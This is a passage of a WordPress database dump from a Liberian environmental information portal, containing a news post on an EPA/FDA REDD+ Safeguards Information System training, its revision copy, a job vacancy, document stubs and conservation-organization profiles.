13:52:22','2020-02-06 13:52:22','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the Forestry Development Authority (FDA) over the weekend concluded a two-day REDD+ Safeguards Information System (SIS) training organized for representatives of civil society organizations (CSOs), Non-governmental Organizations (NGOs) and line government ministries and agencies in Tubmanburg, Bomi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the Forestry Development Authority (FDA) over the weekend concluded a two-day REDD+ Safeguards Information System (SIS) training organized for representatives of civil society organizations (CSOs), Non-governmental Organizations (NGOs) and line government ministries and agencies in Tubmanburg, Bomi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>REDD stands for Reducing Emissions from Deforestation and Forest Degradation in Developing Countries while “+” signifies + conservation of forests, + sustainable management of forests and + enhancement of forest carbon stocks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The REDD+ Safeguards Information System (SIS) was developed by the EPA and the Forestry Development Authority (FDA) with funding from the Forest Carbon Partnership Facility (FCPF) under the World Bank to provide information on how the United Nations Framework Convention on Climate Change (UNFCCC) REDD+ ‘Cancun’ safeguards are being addressed and respected throughout the implementation of the national REDD+ Strategy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-day REDD+ SIS, which attracted participates from the Lake Piso Basin and Gola National Park was held at the Forestry Training Institute (FTI) on 31<sup>st</sup>&nbsp;January and 1<sup>st</sup>&nbsp;February 2020 enabled participants assess the fullness and the user friendliness of the system. Also, the training empowered participants fully understand the institutional arrangements and data collection processes relative to the system. Participants were also drilled through the SIS reporting requirements and taught how to report using the template.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Making opening remark, Atty. Roland Lepol of the REDD+ implementation Unit (RIU) lauded the EPA and the FDA for organizing the training and said the SIS is a requirement for the implementation of the REDD+ activities in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Atty. Roland Lepol said that the development of the SIS is a massive achievement for the government and the overall implementation of the REDD+ activities in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He lauded the EPA for organizing the second part of the SIS training and disclosed that the RIU is charged with the responsibility to coordinate the implementation of the Liberia Forest Sector Project (LFSP) under which the operationalization of the SIS is being done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that the development of the SIS was bankrolled by the additional REDD+ Readiness Project through the LSFP. Hence, the Additional REDD+ Readiness Project is funded by the World Bank.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the LSFP is funded by the Norwegian Government through the World Bank with the objective to improve management of and increase benefit sharing for forest management in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Atty. Lepol noted that the EPA is one of the Project Implementing Entities (PIEs) under the LFSP that is helping to improve regulation for environmental management which also supports the implementation of REDD+. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the SIS is a very important building block for our REDD+ Readiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the opening session, &nbsp;Z. Elijah Whapoe, Focal point of the LFSP and Manager of planning and Policy at the EPA lauded participants for honoring invitation to attend the training and cautioned them to make maximum use of the opportunity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Whapoe disclosed that a previous training on REDD+ Safeguard Information System was held in Ganta from 17-18 January 2020.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the system was developed with the help of Conservation International (CI) and it is one of the first in Africa.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;According to him, the training is technical and it would be a hand-on exercise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the SIS training, Mr. Whapoe used the occasion to inform the audience that members of the Green Climate Fund (GCF) Board are expected to meet in Liberia for the first time and said the gathering will contribute to the economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia is a party of the UNFCCC and is under obligation to among many others develop a REDD+ Safeguard Information System.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Nick Benitos Goll, II, Environmental Safeguards Coordinator for the LFSP/ REDD+ Project in Liberia, said the SIS system is an easy to use system that builds on existing information systems, which seeks to ensure that information is accessible in an appropriate format to meet the needs of different stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a powerpoint presentation, Mr. Goll explained that the system produces summaries of information on REDD+ safeguards for the United Nations Framework Convention on Climate Change (UNFCCC).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the system also provides assurances on safeguards implementation and non-carbon benefits to donors, international companies and markets information to Liberian government on contributions to sustainable development assurances to local stakeholders on their social and environmental priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Providing information on the seven REDD+ Safeguards in the UNFCCC, Mr. Goll disclosed that when undertaking REDD+ activities, a country must promote transparent and effective national forest governance structures, respect the rights of indigenous peoples and members of local communities and promoted the full and effective participation of relevant stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that the protection and conservation of natural forests and their ecosystem as well as the enhancement of other social and environmental benefits are also essential measures a country undertaking REDD+ must strive to achieve.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Goll encouraged members of the public to access information on REDD+ information on the platform at:&nbsp;<a href=\"https://liberia-redd-sis.info/\">https://liberia-redd-sis.info/</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA IT Technician, Ujay Vah said that the portal is developed on a web-server using WordPress content management System and APP Gini PHP web database application.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Providing an overview of the REDD+ SIS, Mr. Vah indicated that the user’s manual consists of three sections: Safeguards Information System Website, Safeguards Information System Database, and Important notes for System Administrators.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA GIS Officer, Lucas T. Knight in a presentation title: “Introduction to the Safeguard Information System SIS Backend” defined backend as the server side of a website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the backend stores and arranges data, and also makes sure everything on the client-side of the website works fine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It is the part of the website that you cannot see and interact with,” Mr. Knight said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the backend consists of three key elements of a website, i.e., application, web server and database.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Sanford V. Daniels, a GIS officer at EPA reiterated that the Liberia REDD+ Safeguards Information System is a web-based portal for providing and disseminating information on how the seven (7) adopted UNFCCC Cancun safeguards for REDD+ are being addressed and respected in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The system, he said provides visibility on the implementation of REDD+ in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','EPA, FDA Conduct REDD+ Safeguards Information System Training for Service Providers in Bomi County','','publish','open','open','','epa-fda-conduct-redd-safeguards-information-system-training-for-service-providers-in-bomi-county','','','2020-08-28 11:24:16','2020-08-28 11:24:16','',0,'https://ekmsliberia.info/?p=2956',205,'post','',0),(2957,38,'2020-02-06 13:49:37','2020-02-06 13:49:37','','featured_news_','Photo Credit: Alloycious David. Participants at the REDD+SIS Information System training workshop post for a group photo','inherit','open','closed','','sis-pic','','','2020-02-06 13:51:51','2020-02-06 13:51:51','',2956,'https://ekmsliberia.info/wp-content/uploads/2020/02/sis-pic.jpg',0,'attachment','image/jpeg',0),(2958,38,'2020-02-06 13:52:22','2020-02-06 13:52:22','<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the Forestry Development Authority (FDA) over the weekend concluded a two-day REDD+ Safeguards Information System (SIS) training organized for representatives of civil society organizations (CSOs), Non-governmental Organizations (NGOs) and line government ministries and agencies in Tubmanburg, Bomi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the Forestry Development Authority (FDA) over the weekend concluded a two-day REDD+ Safeguards Information System (SIS) training organized for representatives of civil society organizations (CSOs), Non-governmental Organizations (NGOs) and line government ministries and agencies in Tubmanburg, Bomi County.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>REDD stands for Reducing Emissions from Deforestation and Forest Degradation in Developing Countries while “+” signifies + conservation of forests, + sustainable management of forests and + enhancement of forest carbon stocks.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The REDD+ Safeguards Information System (SIS) was developed by the EPA and the Forestry Development Authority (FDA) with funding from the Forest Carbon Partnership Facility (FCPF) under the World Bank to provide information on how the United Nations Framework Convention on Climate Change (UNFCCC) REDD+ ‘Cancun’ safeguards are being addressed and respected throughout the implementation of the national REDD+ Strategy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The two-day REDD+ SIS, which attracted participates from the Lake Piso Basin and Gola National Park was held at the Forestry Training Institute (FTI) on 31<sup>st</sup>&nbsp;January and 1<sup>st</sup>&nbsp;February 2020 enabled participants assess the fullness and the user friendliness of the system. Also, the training empowered participants fully understand the institutional arrangements and data collection processes relative to the system. Participants were also drilled through the SIS reporting requirements and taught how to report using the template.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Making opening remark, Atty. Roland Lepol of the REDD+ implementation Unit (RIU) lauded the EPA and the FDA for organizing the training and said the SIS is a requirement for the implementation of the REDD+ activities in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Atty. Roland Lepol said that the development of the SIS is a massive achievement for the government and the overall implementation of the REDD+ activities in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He lauded the EPA for organizing the second part of the SIS training and disclosed that the RIU is charged with the responsibility to coordinate the implementation of the Liberia Forest Sector Project (LFSP) under which the operationalization of the SIS is being done.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that the development of the SIS was bankrolled by the additional REDD+ Readiness Project through the LSFP. Hence, the Additional REDD+ Readiness Project is funded by the World Bank.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the LSFP is funded by the Norwegian Government through the World Bank with the objective to improve management of and increase benefit sharing for forest management in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Atty. Lepol noted that the EPA is one of the Project Implementing Entities (PIEs) under the LFSP that is helping to improve regulation for environmental management which also supports the implementation of REDD+. &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the SIS is a very important building block for our REDD+ Readiness.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Also speaking at the opening session, &nbsp;Z. Elijah Whapoe, Focal point of the LFSP and Manager of planning and Policy at the EPA lauded participants for honoring invitation to attend the training and cautioned them to make maximum use of the opportunity.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Whapoe disclosed that a previous training on REDD+ Safeguard Information System was held in Ganta from 17-18 January 2020.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He explained that the system was developed with the help of Conservation International (CI) and it is one of the first in Africa.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>&nbsp;According to him, the training is technical and it would be a hand-on exercise.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>At the SIS training, Mr. Whapoe used the occasion to inform the audience that members of the Green Climate Fund (GCF) Board are expected to meet in Liberia for the first time and said the gathering will contribute to the economy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Liberia is a party of the UNFCCC and is under obligation to among many others develop a REDD+ Safeguard Information System.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Nick Benitos Goll, II, Environmental Safeguards Coordinator for the LFSP/ REDD+ Project in Liberia, said the SIS system is an easy to use system that builds on existing information systems, which seeks to ensure that information is accessible in an appropriate format to meet the needs of different stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>In a powerpoint presentation, Mr. Goll explained that the system produces summaries of information on REDD+ safeguards for the United Nations Framework Convention on Climate Change (UNFCCC).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to him, the system also provides assurances on safeguards implementation and non-carbon benefits to donors, international companies and markets information to Liberian government on contributions to sustainable development assurances to local stakeholders on their social and environmental priorities.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Providing information on the seven REDD+ Safeguards in the UNFCCC, Mr. Goll disclosed that when undertaking REDD+ activities, a country must promote transparent and effective national forest governance structures, respect the rights of indigenous peoples and members of local communities and promoted the full and effective participation of relevant stakeholders.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He indicated that the protection and conservation of natural forests and their ecosystem as well as the enhancement of other social and environmental benefits are also essential measures a country undertaking REDD+ must strive to achieve.&nbsp;</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Mr. Goll encouraged members of the public to access information on REDD+ information on the platform at:&nbsp;<a href=\"https://liberia-redd-sis.info/\">https://liberia-redd-sis.info/</a>.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA IT Technician, Ujay Vah said that the portal is developed on a web-server using WordPress content management System and APP Gini PHP web database application.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Providing an overview of the REDD+ SIS, Mr. Vah indicated that the user’s manual consists of three sections: Safeguards Information System Website, Safeguards Information System Database, and Important notes for System Administrators.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>EPA GIS Officer, Lucas T. Knight in a presentation title: “Introduction to the Safeguard Information System SIS Backend” defined backend as the server side of a website.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He disclosed that the backend stores and arranges data, and also makes sure everything on the client-side of the website works fine.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>“It is the part of the website that you cannot see and interact with,” Mr. Knight said.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He noted that the backend consists of three key elements of a website, i.e., application, web server and database.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>For his part, Sanford V. Daniels, a GIS officer at EPA reiterated that the Liberia REDD+ Safeguards Information System is a web-based portal for providing and disseminating information on how the seven (7) adopted UNFCCC Cancun safeguards for REDD+ are being addressed and respected in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The system, he said provides visibility on the implementation of REDD+ in Liberia.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p> </p>\n<!-- /wp:paragraph -->','EPA, FDA Conduct REDD+ Safeguards Information System Training for Service Providers in Bomi County','','inherit','closed','closed','','2956-revision-v1','','','2020-02-06 13:52:22','2020-02-06 13:52:22','',2956,'https://ekmsliberia.info/2956-revision-v1/',0,'revision','',0),(2963,38,'2020-02-18 18:17:55','2020-02-18 18:17:55','','giz-logo','','inherit','open','closed','','giz-logo','','','2021-08-17 22:14:56','2021-08-17 22:14:56','',2965,'https://ekmsliberia.info/wp-content/uploads/2020/02/giz-logo.gif',0,'attachment','image/gif',0),(2964,38,'2020-02-26 16:18:05','2020-02-26 16:18:05','<h3><strong>COMING SOON!!!!!!</strong></h3>\r\n','Habitat for Humanity International','','publish','closed','closed','','habitat-for-humanity-international','','','2021-08-17 20:57:09','2021-08-17 20:57:09','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=2964',13,'institution','',0),(2965,38,'2020-02-18 18:36:20','2020-02-18 18:36:20','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\r\n\r\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\r\n','German Liberian Cooperation','','publish','closed','closed','','https-www-giz-de-en-html-index-html','','','2021-08-17 22:14:56','2021-08-17 22:14:56','',0,'https://ekmsliberia.info/?post_type=institution&#038;p=2965',21,'institution','',0),(2967,38,'2020-02-18 18:36:20','2020-02-18 18:36:20','The Society for the Conservation of Nature of Liberia (SCNL) is Liberia’s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia’s natural resources to ensure a healthy environment and good quality life for all people in Liberia.\r\n\r\nSCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.\r\n<h2>Featured Projects</h2>\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:scnl\" page_length=\"false\"]','German Liberian Cooperation','','inherit','closed','closed','','2965-revision-v1','','','2020-02-18 18:36:20','2020-02-18 18:36:20','',2965,'https://ekmsliberia.info/2965-revision-v1/',0,'revision','',0),(2971,38,'2020-02-21 09:52:31','2020-02-21 09:52:31','<strong>Conservation International</strong> (CI) has been protecting nature for the benefit of all for over 30 years. Through science, policy, and partnerships, CI is helping build a healthier, more prosperous and more productive planet. CI is a global organization that has been active in Liberia for nearly 17 years working closely with communities, private sector, government and civil society leaders to support conservation and sustainable development. With enormous wealth of natural resources, Liberia is at a vital point in its development history and has an opportunity to encourage investors and promote development initiatives that both support economic growth and development while maintaining Liberia’s critical natural capital for future generations. Proper stewardship of Liberia’s resources may prove to be the key to the future well-being of Liberian people. To this end, CI Liberia in collaboration with Environment Protection Agency (EPA) will be implementing a Global Environment Facility (GEF) funded project on conservation and sustainable use of Liberia’s coastal natural capital. CI and EPA Liberia is now seeking a Project Manager to oversee this project implementation.\r\n\r\n&nbsp;\r\n\r\n<a href=\"http://www.epa.gov.lr/content/vacancy-announcement-gef-natural-capital-accounting-nca-project-manager\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/content/vacancy-announcement-gef-natural-capital-accounting-nca-project-manager</a>','VACANCY ANNOUNCEMENT: GEF NATURAL CAPITAL ACCOUNTING (NCA) PROJECT MANAGER','','publish','closed','closed','','vacancy-announcement-gef-natural-capital-accounting-nca-project-manager','','','2020-02-21 10:06:51','2020-02-21 10:06:51','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=2971',130,'ekms_bulletin','',0),(2972,38,'2020-02-21 09:55:42','2020-02-21 09:55:42','','CI Liberia NCA Project Manager Advert_02032020 (1)(2)','','inherit','open','closed','','ci-liberia-nca-project-manager-advert_02032020-12','','','2020-02-21 09:55:42','2020-02-21 09:55:42','',2971,'https://ekmsliberia.info/wp-content/uploads/2020/02/CI-Liberia-NCA-Project-Manager-Advert_02032020-12.pdf',0,'attachment','application/pdf',0),(2973,38,'2020-02-21 10:06:23','2020-02-21 10:06:23','Conservation International (CI) has been protecting nature for the benefit of all for over 30 years. Through science, policy, and partnerships, CI is helping build a healthier, more prosperous and more productive planet. CI is a global organization that has been active in Liberia for nearly 17 years working closely with communities, private sector, government and civil society leaders to support conservation and sustainable development. With enormous wealth of natural resources, Liberia is at a vital point in its development history and has an opportunity to encourage investors and promote development initiatives that both support economic growth and development while maintaining Liberia’s critical natural capital for future generations. Proper stewardship of Liberia’s resources may prove to be the key to the future well-being of Liberian people. To this end, CI Liberia in collaboration with Environment Protection Agency (EPA) will be implementing a Global Environment Facility (GEF) funded project on conservation and sustainable use of Liberia’s coastal natural capital. CI and EPA Liberia is now seeking a Project Manager to oversee this project implementation.\n\n&nbsp;\n\n<a href=\"http://www.epa.gov.lr/content/vacancy-announcement-gef-natural-capital-accounting-nca-project-manager\" target=\"_blank\" rel=\"noopener noreferrer\">http://www.epa.gov.lr/content/vacancy-announcement-gef-natural-capital-accounting-nca-project-manager</a>','VACANCY ANNOUNCEMENT: GEF NATURAL CAPITAL ACCOUNTING (NCA) PROJECT MANAGER','','inherit','closed','closed','','2971-autosave-v1','','','2020-02-21 10:06:23','2020-02-21 10:06:23','',2971,'https://ekmsliberia.info/2971-autosave-v1/',0,'revision','',0),(2976,38,'2020-02-21 17:23:11','2020-02-21 17:23:11','','tna-logo-rgb','','inherit','open','closed','','tna-logo-rgb','','','2020-02-21 17:23:11','2020-02-21 17:23:11','',0,'https://ekmsliberia.info/wp-content/uploads/2020/02/tna-logo-rgb.png',0,'attachment','image/png',0),(2986,38,'2020-02-24 14:17:54','2020-02-24 14:17:54','','Annual Report','','inherit','open','closed','','annual-report','','','2020-02-24 14:17:54','2020-02-24 14:17:54','',0,'https://ekmsliberia.info/wp-content/uploads/2020/02/Annual-Report.pdf',0,'attachment','application/pdf',0),(2988,38,'2020-02-26 00:10:33','2020-02-26 00:10:33','','LiMA Strategic Plan 2019-2023 v2-2','','inherit','open','closed','','lima-strategic-plan-2019-2023-v2-2','','','2020-02-26 00:10:33','2020-02-26 00:10:33','',0,'https://ekmsliberia.info/wp-content/uploads/2020/02/LiMA-Strategic-Plan-2019-2023-v2-2.pdf',0,'attachment','application/pdf',0),(2989,38,'2020-02-26 00:28:56','2020-02-26 00:28:56','I am delighted to present the Strategic Plan for the Liberia Maritime Authority. We have retained our strong international brand and we are determined to develop a best in class domestic and international maritime operation. We foresee this sector becoming a major income generator that will underpin the vibrancy of the Liberian economy.\r\nThe strategic planning process over the last several months has realigned our focus and resources to make strategic choices and craft specific and measurable goals and objectives which are in line with attaining our five (5) year vision of “Building a vibrant domestic maritime program that is financially self-sustaining, internationally compliant, and effective in protecting our maritime domain”.\r\nIn order to accomplish this, we need foresight and adaptability from all our partners and stakeholders. Technology, Tourism and Trade are key to our continued growth. We need to embrace innovation and ensure we continue to build a sustainable marine environment.','Liberia Martime Authority Multi Year Strategic Plan 2019-2023','','publish','closed','closed','','multi-year-strategic-plan-2019-2023','','','2022-01-04 07:53:51','2022-01-04 07:53:51','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2989',132,'document','',0),(2990,38,'2020-02-26 00:26:55','2020-02-26 00:26:55','','LiMA Strategic Plan 2019-2023 v2-2','','inherit','open','closed','','lima-strategic-plan-2019-2023-v2-2-2','','','2020-02-26 00:26:55','2020-02-26 00:26:55','',2989,'https://ekmsliberia.info/wp-content/uploads/2020/02/LiMA-Strategic-Plan-2019-2023-v2-2-1.pdf',0,'attachment','application/pdf',0),(2991,38,'2020-02-26 00:39:48','2020-02-26 00:39:48','This publication is an output of the Technology Needs Assessment project, funded by the Global Environment Facility (GEF) and implemented by the United Nations Environment Programme (UN Environment) and the UNEP DTU Partnership (UDP) in collaboration with University of Cape Town. The views expressed in this publication are those of the authors and do not necessarily reflect the views of UNEP DTU Partnership, UN Environment or University of Cape Town. We regret any errors or omissions that may have been unwittingly made. This publication may be reproduced in whole or in part and in any form for educational or non-profit services without special permission from the copyright holder, provided acknowledgement of the source is made. No use of this publication may be made for resale or any other commercial purpose whatsoever without prior permission in writing from the UNEP DTU Partnership.','Technology Needs Assessment Agriculture Report June 2019','','publish','closed','closed','','technology-needs-assessment-agriculture-report-june-2019','','','2022-12-06 10:56:23','2022-12-06 10:56:23','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2991',131,'document','',0),(2992,38,'2020-02-26 00:35:10','2020-02-26 00:35:10','','tna-agriculture-report-liberia','','inherit','open','closed','','tna-agriculture-report-liberia','','','2020-02-26 00:35:10','2020-02-26 00:35:10','',2991,'https://ekmsliberia.info/wp-content/uploads/2020/02/tna-agriculture-report-liberia.pdf',0,'attachment','application/pdf',0),(2993,38,'2020-02-26 00:47:04','2020-02-26 00:47:04','This coastal zone’s Technology Needs Assessment for climate change adaptation in Liberia has been achieved through a tremendous collaborative effort by many institutions, affected and vulnerable coastal communities through stakeholders’ engagements, sites’ visits, documents and interviews with residents of coastal communities facilitated by the Environmental Protection Agency of Liberia (EPA) and the TNA. The institutions, communities and individuals mentioned in this report are duly acknowledged for their valuable contributions that successfully resulted to this report.','Coastal Zone\'s Technology Needs Assessment for Climate Change Adaptation','','publish','closed','closed','','coastal-zones-technology-needs-assessment-for-climate-change-adaptation','','','2022-12-06 11:13:46','2022-12-06 11:13:46','',0,'https://ekmsliberia.info/?post_type=document&#038;p=2993',126,'document','',0),(2994,38,'2020-02-26 00:46:25','2020-02-26 00:46:25','','tna-report-coastal-zone-liberia','','inherit','open','closed','','tna-report-coastal-zone-liberia','','','2020-02-26 00:46:25','2020-02-26 00:46:25','',2993,'https://ekmsliberia.info/wp-content/uploads/2020/02/tna-report-coastal-zone-liberia.pdf',0,'attachment','application/pdf',0),(2995,38,'2020-02-26 00:52:51','2020-02-26 00:52:51','This coastal zone’s Technology Needs Assessment for climate change adaptation in Liberia has been achieved through a tremendous collaborative effort by many institutions, affected and vulnerable coastal communities through stakeholders’ engagements, sites’ visits, documents and interviews with residents of coastal communities facilitated by the Environmental Protection Agency of Liberia (EPA) and the TNA. The institutions, communities and individuals mentioned in this report are duly acknowledged for their valuable contributions that successfully resulted to this report.','Coastal Zone\'s Technology Needs Assessment for Climate Change Adaptation','','inherit','closed','closed','','2993-autosave-v1','','','2020-02-26 00:52:51','2020-02-26 00:52:51','',2993,'https://ekmsliberia.info/2993-autosave-v1/',0,'revision','',0),(2999,38,'2020-02-26 16:18:05','2020-02-26 16:18:05','We are Habitat for Humanity, a nonprofit housing organization that helps low-income people around the world access decent housing.Residential energy is eating up more than 30 percent of the total energy usage, leaving people with low incomes and those in the poorest communities trapped in a cycle of poverty. Unable to afford the capital to improve their old and poorly built housing, they have to sacrifice essentials such as food to pay their heating bills.\r\n\r\n<a href=\"https://www.habitat.org/emea/impact/what-we-do\" target=\"_blank\" rel=\"noopener noreferrer\">Habitat for Humanity</a> is working with <a href=\"https://www.usaid.gov/\" target=\"_blank\" rel=\"noopener noreferrer\">USAID</a> to pioneer new ways to <strong>help communities overcome the legacy of poorly built, energy inefficient housing stock of multi-apartment buildings</strong>, and to create strong, stable and healthy communities for the future.\r\n\r\nAt the heart of our <a href=\"https://youtu.be/yVVvUoCIl24\" target=\"_blank\" rel=\"noopener noreferrer\">approach</a> is creating an ‘ecosystem of stakeholders’ in which the challenges of ‘common space renovations’ and its financing are funded by appropriate loans. This approach also empowers local stakeholders to take action through their local housing associations or representative bodies.\r\n\r\nWe are using this approach in Armenia, Bosnia and Herzegovina and Macedonia. Our projects in these countries have been highly successful at producing real <strong>improvements in energy efficiency and reducing energy costs</strong>, as well as enhancing social cohesion, comfort and health.\r\n\r\n<strong>We are keen to work with more partners and funders</strong> to scale up this and other energy efficiency programs in Europe, the Middle East and African.\r\n\r\nHabitat for Humanity works to<strong> improve the water supply and cleanliness of human settlements.</strong> We also work to promote sustainable hygiene practices through initiatives often referred to as water, sanitation and hygiene or WASH programs.\r\n\r\nWASH programs are among the most cost-effective housing and settlement ways to improve the conditions of people living in poor conditions. Habitat often includes WASH initiatives in our disaster reduction and response programs.\r\n<h2>Featured Projects</h2>\r\n&nbsp;\r\n<h2>Related Documents</h2>\r\n[posts_table post_type=\"document\"\r\ncolumns=\"id,title,\r\nexcerpt,cf:download_link,\r\ntax:resource_category:Categories,\r\n\" width=\"auto,250px,400px,auto,auto,auto\" term=\"resource_tag:ffi\" page_length=\"false\"]','Habitat for Humanity International','','inherit','closed','closed','','2964-revision-v1','','','2020-02-26 16:18:05','2020-02-26 16:18:05','',2964,'https://ekmsliberia.info/2964-revision-v1/',0,'revision','',0),(3001,38,'2020-02-26 16:54:31','2020-02-26 16:54:31','','future project','','inherit','open','closed','','future-project','','','2020-02-26 16:54:31','2020-02-26 16:54:31','',2964,'https://ekmsliberia.info/wp-content/uploads/2020/02/future-project.jpg',0,'attachment','image/jpeg',0),(3002,38,'2020-02-26 16:57:22','2020-02-26 16:57:22','<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country’s oldest protected area – Sapo National Park – after years of civil conflict.</p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.</p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.</p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.</p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.</p><p>FFI is also supporting Liberia’s up-and-coming conservationists by helping to build conservation capacity at a national level – something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and 